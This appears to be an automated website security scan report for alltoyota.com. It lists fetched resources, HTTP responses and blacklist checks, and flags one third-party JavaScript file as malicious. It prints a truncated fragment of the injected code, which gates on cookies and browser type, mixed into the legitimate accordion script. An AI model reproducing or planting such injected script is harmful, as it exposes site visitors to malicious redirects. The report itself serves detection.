Scanned pages/files
Request | Server response | Status |
http://www.alltoyota.com/ | HTTP/1.1 302 Object moved Cache-Control: private Cache-Control: no-cache Date: Tue, 30 Sep 2014 10:03:38 GMT Pragma: no-cache Location: http://www.alltoyotrucks.com Server: Microsoft-IIS/6.0 Content-Length: 149 Content-Type: text/html Expires: Fri, 01 Jan 1999 05:00:00 GMT Set-Cookie: ASPSESSIONIDASSRQRRT=IMGNHCNAEKNFHIDLMEFHPOLN; path=/ X-Powered-By: ASP.NET | clean |
http://www.alltoyotrucks.com/ | 200 OK Content-Length: 60077 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
https://secure.dealerstore.net/include/ddaccordion.js | 200 OK Content-Length: 13586 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u $(window).bind('unload', function(){ $('.'+config["headerclass"]).unbind() var expandedindices=[] $('.'+config["contentclass"]+":visible").each(function(index){ expandedindices.push($(this).attr('contentindex')) }) if (config.persiststate==true){ expandedindices=(expandedindices.length==0)? '-1c' : expandedindices ddaccordion.setCookie(config.headerclass, expandedindices) } }) }) } } Antivirus reports:
| ||
http://s9.addthis.com/js/widget.php?v=10 | 200 OK Content-Length: 7611 Content-Type: text/plain | clean |
http://s9.addthis.com/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/plain | clean |
http://www.alltoyota.com/include/MY.js | 200 OK Content-Length: 58557 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alltoyota.com
Result:
GET / HTTP/1.1
Host: alltoyota.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: alltoyota.com
Referer: http://www.google.com/search?q=alltoyota.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: alltoyota.com
Referer: http://www.google.com/search?q=alltoyota.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alltoyota.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alltoyota.com/
Result: alltoyota.com is not infected or malware details are not published yet.
Result: alltoyota.com is not infected or malware details are not published yet.